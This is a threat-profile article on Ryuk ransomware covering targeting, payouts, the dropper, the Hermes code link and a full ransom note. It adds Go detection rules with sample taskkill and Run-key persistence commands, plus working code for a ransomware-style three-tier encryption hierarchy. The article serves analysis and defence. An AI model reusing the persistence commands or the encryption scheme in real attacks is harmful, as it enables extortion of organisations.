
Ryuk Ransomware

Posted: August 23, 2018

The Ryuk Ransomware is a file-locker that appears to be built on the codebase of the Hermes Ransomware, while its ransom message copies the style seen in the BitPaymer Ransomware attacks. Whether the cybercrooks behind the Ryuk Ransomware have anything to do with those two file-lockers, or whether this is an entirely new operation, is not yet known. The number of victims so far is low, but most of them are companies, which suggests that the Ryuk Ransomware does not target random users; instead, its operators use targeted propagation techniques to go after organizations capable of paying a hefty ransom.

Ryuk's Operators Focus on Attacking Company Servers

It is possible that the Ryuk Ransomware's operators rely on phishing e-mails or on attacks against exposed Remote Desktop services to get onto the computers. Whatever the infection vector, the consequences are the same: a large number of encrypted files that can only be recovered with specialized software and the decryption key held on the attackers' server. Apart from the encrypted files, the only new artifact the attack leaves behind is a file called 'RyukReadMe.txt,' which contains the ransom message. Surprisingly, the attackers have used several ransom note styles and e-mail addresses, possibly an effort to make it look as though more than one group is behind these attacks. The e-mail addresses associated with the Ryuk Ransomware's operators are:

'MelisaPeterman@protonmail.com', 'MelisaPeterman@tutanota.com', 'eliasmarco@tutanota.com', 'CamdenScott@protonmail.com', and 'AndyMitton@protonmail.com'

Ryuk ransomware is a high-threat malware family that has been used in multiple targeted attacks across the globe, primarily attributed to a single outfit tracked as Grim Spider. Ryuk was first seen in 2018, and although reporters initially suggested it was run by a North Korean state-sponsored hacking group, multiple security researchers later published reports linking Ryuk to Russian criminal actors.

Ryuk is not your garden-variety ransomware distributed en masse through spam e-mails. It is a far more targeted threat, developed and precision-tooled to hit large businesses and corporations, where the ransom demands are astronomical and the damage those businesses would suffer if they had to halt operations is just as immense. According to a report by Check Point researchers, by late 2018 the threat actors behind Ryuk had already collected a hefty $640,000 in ransom payments, with individual ransoms ranging between 15 and 50 Bitcoin. Ryuk hit the major US publishing company Tribune Publishing in late 2018 and was used against US public-sector bodies in 2019, including a strike against the Committee for Public Counsel Services in Boston.

Ryuk differs from most other ransomware in that it encrypts in a far more focused manner, targeting only the critical parts of the data, and in that it is run under manual control by the attackers. Manual control requires that the operators have already mapped the target network thoroughly and collected a large number of login credentials, which points to extensive preparation.

The ransom note Ryuk drops comes in one of two variants. The first is longer and somewhat more polite; it was used in the single attack that netted the crooks their biggest payment to date, a massive 50 Bitcoin, or over $300,000 at the time. The second is shorter and appeared in attacks that also led to ransom payments of over $200,000 each.

Researchers with Check Point discovered clear similarities between Ryuk and the older HERMES ransomware, which was first used in late 2017. The two share code in the way they encrypt files, to the point where Ryuk uses identical routines for placing the encryption marker in a victim's files and for verifying it before processing a file.

Here is the full text of one of the ransom notes:


Gentlemen!

Your business is at serious risk.
There is significant hole in the security system of your company.
We've easily penetrated your network.
You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks.
They can damage all your important data just for fun.

Now your files are crypted with the strongest military algorithms RSA4096 and AES-256.
No one can help you to restore your files irreversibly.

If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files
(Less than 5 Mb each, non-archived and your files should not contain valuable information
(Databases, backups, large excel sheets, etc.)).
You will receive decrypted samples and our conditions how to get the decoder.
Please don't forget to write the name of your company in the subject of your e-mail.

You have to pay for decryption in Biscuits.
The final price depends on how fast you write to us.
Every day of delay will cost you additional +0.5 BIT
Nothing personal just business

As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future
+ we will recommend you special software that makes the most problems to hackers.

Attention! One more time !

Do not rename encrypted files.
Do not try to decrypt your data using third party software.

P.S. Remember, we are not scammers. We don't need your files and your information.
But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection.
All data will be restored absolutely.
Your warranty - decrypted samples. contact emails eliasmarco at tutanota.com
Or
CamdenScott at protonmail.com

BTC wallet: [alphanumeric string]

Ryuk
No system is safe

Check Point's technical analysis of Ryuk reveals a great deal about how the ransomware works.

Starting with the dropper that delivers Ryuk: it carries both the 32-bit and the 64-bit build of the payload inside its own binary. On execution, the dropper generates a random filename and writes the payload matching the host's architecture under that name into the \users\Public\ directory on modern Windows versions. Before exiting, the dropper runs the payload it just deployed.

When it executes, Ryuk uses "taskkill" and "net stop" commands to shut down over 200 processes and services from a hard-coded list. The terminated entries are, as expected, mostly antivirus, antimalware and backup products, which both removes interference and makes sure backup-related files are not locked when encryption starts. Once this is done, Ryuk secures persistence across reboots by registering itself in the Run key. The command, as reproduced in the Check Point analysis (the /d argument is followed by the path of the dropped payload), is:

reg add /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d
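The drop location, the taskkill/net stop burst and the Run-key write described above are all visible in process-creation telemetry, so here is an added detection example in Go. It is my code, not anything from the Check Point report or from Ryuk itself: three rules run over a constructed batch of Sysmon-style events. The event shape, the 20-launch burst threshold, the host names and the sample process and service names are assumptions; the "svchos" value name and the \Users\Public\ path are the ones the page gives.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Event is one process-creation record, cut down to the fields the rules use
// (what a Sysmon event ID 1 or a Windows 4688 event would carry).
type Event struct {
	Host    string
	Image   string // full path of the started executable
	CmdLine string
}

// Finding is one rule hit on one host.
type Finding struct {
	Host, Rule, Detail string
}

// killBurst is the number of taskkill / "net stop" launches from one host,
// within the batch given to Scan, that we treat as mass termination.
// ASSUMPTION: set it above what admin scripts produce in one batch.
const killBurst = 20

// killRe matches the two primitives the text describes: taskkill (any path,
// with or without .exe) and "net stop" (net.exe hands the work to net1.exe,
// so both names count). A leading quote and a drive path are tolerated.
var killRe = regexp.MustCompile(`(?i)^"?(?:[a-z]:\\[^"\s]*\\)?(?:taskkill(?:\.exe)?"?\s|net1?(?:\.exe)?"?\s+stop\b)`)

func isKill(cmdLine string) bool {
	return killRe.MatchString(strings.TrimSpace(cmdLine))
}

// classifyOne applies the per-event rules: a process started out of
// \Users\Public\ (the dropper's drop location) and a Run-key write whose
// value name is "svchos".
func classifyOne(e Event) []Finding {
	var out []Finding
	cmd := strings.ToLower(e.CmdLine)
	if strings.Contains(strings.ToLower(e.Image), `\users\public\`) {
		out = append(out, Finding{e.Host, "exec-from-users-public", e.Image})
	}
	if strings.Contains(cmd, "reg add") &&
		strings.Contains(cmd, `\currentversion\run`) &&
		strings.Contains(cmd, `/v "svchos"`) {
		out = append(out, Finding{e.Host, "run-key-svchos", e.CmdLine})
	}
	return out
}

// Scan runs the per-event rules, then the per-host burst rule.
func Scan(events []Event) []Finding {
	var out []Finding
	kills := map[string]int{}
	for _, e := range events {
		out = append(out, classifyOne(e)...)
		if isKill(e.CmdLine) {
			kills[e.Host]++
		}
	}
	hosts := make([]string, 0, len(kills))
	for h := range kills {
		hosts = append(hosts, h)
	}
	sort.Strings(hosts) // stable output regardless of map order
	for _, h := range hosts {
		if kills[h] >= killBurst {
			out = append(out, Finding{h, "mass-taskkill-netstop",
				fmt.Sprintf("%d taskkill/net stop launches in batch", kills[h])})
		}
	}
	return out
}

// SampleEvents is a constructed batch (not real telemetry): WS01 shows the
// whole sequence, WS02 is an admin stopping one service and opening an editor.
func SampleEvents() []Event {
	ev := []Event{
		{"WS02", `C:\Windows\System32\net1.exe`, `C:\Windows\system32\net1 stop spooler`},
		{"WS02", `C:\Windows\System32\notepad.exe`, `"C:\Windows\System32\notepad.exe"`},
		{"WS01", `C:\Users\Public\sample-payload.exe`, `"C:\Users\Public\sample-payload.exe"`},
	}
	for i := 0; i < 12; i++ {
		ev = append(ev,
			Event{"WS01", `C:\Windows\System32\taskkill.exe`, fmt.Sprintf(`taskkill /IM sample%02d.exe /F`, i)},
			Event{"WS01", `C:\Windows\System32\net1.exe`, fmt.Sprintf(`C:\Windows\system32\net1 stop samplesvc%02d /y`, i)})
	}
	return append(ev, Event{"WS01", `C:\Windows\System32\reg.exe`,
		`REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\sample-payload.exe"`})
}

func main() {
	for _, f := range Scan(SampleEvents()) {
		fmt.Printf("%s  %-24s %s\n", f.Host, f.Rule, f.Detail)
	}
}
```

A single "net stop" or taskkill is routine administration, which is why the burst rule counts per host rather than alerting on each event; the other two rules are specific enough to fire on a single event. In a real pipeline the batch handed to Scan would be a short time window per host.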

For encryption, Ryuk uses three tiers of keys: a global RSA key pair whose private half is only available to the attackers, an RSA key pair that is unique to each victim, and AES symmetric keys for the file data, which are wrapped with the victim-specific RSA public key and stored alongside the encrypted content. The victim's RSA private key is in turn encrypted with the global public key, so nothing left on the infected machine can decrypt the files without the attackers' global private key. Encrypted files usually receive the ".ryk" extension.
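To make the three-tier hierarchy concrete, and to show the marker check that the Hermes comparison earlier on this page refers to, here is an added Go example. It is my illustration, not Ryuk's or Hermes's code: tier 1 is a global RSA-2048 pair, tier 2 a per-victim RSA-2048 pair whose private half is sealed to the global public key, and tier 3 a fresh AES-256 key per file that is wrapped to the victim public key and carried inside the file. The marker bytes, the hybrid RSA-OAEP plus AES-GCM sealing, the file layout and the per-file AES key are my own design choices for the example; the page gives none of these details.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"errors"
	"fmt"
)

// Trailer appended to every encrypted file so the encryptor can recognise files
// it already processed. ASSUMPTION: illustrative bytes, not the real marker.
var marker = []byte("EXAMPLE-ENC-MARKER")
const nonceLen = 12 // standard AES-GCM nonce size

// VictimKeys is everything that stays on the infected host.
type VictimKeys struct {
	Pub        *rsa.PublicKey
	SealedPriv []byte // victim private key, opaque without the tier-1 private key
}

// must: seal-side calls fail only on programmer error, so panicking is fine there.
func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}
func newGCM(key []byte) cipher.AEAD { return must(cipher.NewGCM(must(aes.NewCipher(key)))) }

// Tier 1: the global pair. A sample would embed only &key.PublicKey.
func NewGlobalKey() *rsa.PrivateKey { return must(rsa.GenerateKey(rand.Reader, 2048)) }

// Tier 2: a per-victim pair, sealed at once so the host can never use its own
// private half; priv is then simply dropped.
func NewVictimKeys(globalPub *rsa.PublicKey) *VictimKeys {
	priv := must(rsa.GenerateKey(rand.Reader, 2048))
	sealed := hybridSeal(globalPub, x509.MarshalPKCS1PrivateKey(priv))
	return &VictimKeys{Pub: &priv.PublicKey, SealedPriv: sealed}
}

// Tier 3: a fresh AES-256 key per file, wrapped to the victim public key and
// carried inside the file, followed by the marker.
func EncryptFile(v *VictimKeys, content []byte) ([]byte, error) {
	if IsMarked(content) {
		return nil, errors.New("already encrypted")
	}
	return append(hybridSeal(v.Pub, content), marker...), nil
}

// IsMarked is the marker verification: does the file end with the trailer?
func IsMarked(b []byte) bool { return bytes.HasSuffix(b, marker) }

// Operator side: global private -> victim private -> file contents.
func RecoverVictimKey(global *rsa.PrivateKey, v *VictimKeys) (*rsa.PrivateKey, error) {
	der, err := hybridOpen(global, v.SealedPriv)
	if err != nil {
		return nil, err
	}
	return x509.ParsePKCS1PrivateKey(der)
}

func DecryptFile(victimPriv *rsa.PrivateKey, enc []byte) ([]byte, error) {
	if !IsMarked(enc) {
		return nil, errors.New("no marker: not an encrypted file")
	}
	return hybridOpen(victimPriv, enc[:len(enc)-len(marker)])
}

// hybridSeal/hybridOpen: RSA-OAEP wraps a random AES-256 key, AES-GCM seals the
// data. Layout: wrappedKey (pub.Size() bytes) | nonce | ciphertext+tag. Hybrid is
// unavoidable because a DER-encoded RSA-2048 private key exceeds one OAEP block.
func hybridSeal(pub *rsa.PublicKey, data []byte) []byte {
	kn := make([]byte, 32+nonceLen) // fresh AES-256 key || GCM nonce
	must(rand.Read(kn))
	out := must(rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, kn[:32], nil))
	out = append(out, kn[32:]...)
	return newGCM(kn[:32]).Seal(out, kn[32:], data, nil)
}

func hybridOpen(priv *rsa.PrivateKey, blob []byte) ([]byte, error) {
	n := priv.Size()
	if len(blob) < n+nonceLen {
		return nil, errors.New("short blob")
	}
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, blob[:n], nil)
	if err != nil {
		return nil, err // a wrong private key fails here
	}
	return newGCM(key).Open(nil, blob[n:n+nonceLen], blob[n+nonceLen:], nil)
}

func main() {
	global := NewGlobalKey()              // operators, once
	v := NewVictimKeys(&global.PublicKey) // on the victim: public half only
	enc, _ := EncryptFile(v, []byte("constructed sample document"))
	vp, _ := RecoverVictimKey(global, v)
	pt, _ := DecryptFile(vp, enc)
	fmt.Printf("marked=%v recovered=%q\n", IsMarked(enc), pt)
}
```

The point of the layering is visible in RecoverVictimKey: the host only ever holds SealedPriv, so a forensic image of the machine yields wrapped keys and nothing that opens them, and the marker check is what keeps a second pass from re-encrypting files that already carry a wrapped key.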

The encryption routine skips directories belonging to web browsers, since the victim needs a working browser to read the ransom note and buy Bitcoin. One curious detail pointing to a link between Ryuk and Hermes is that the directory whitelist also includes "AhnLab", a South Korean IT security vendor. Ryuk does not target South Korean victims, so this entry is hard to explain on its own and suggests that Ryuk was built from older Hermes code.

Ryuk remains notable first and foremost for its massive victim payouts. Compared with other popular strains such as Dharma or GandCrab, Ryuk brought far greater profit to its operators. This is largely because it was used against larger businesses that stood to lose more from production disruption and downtime, and that ended up paying the large ransom amounts.
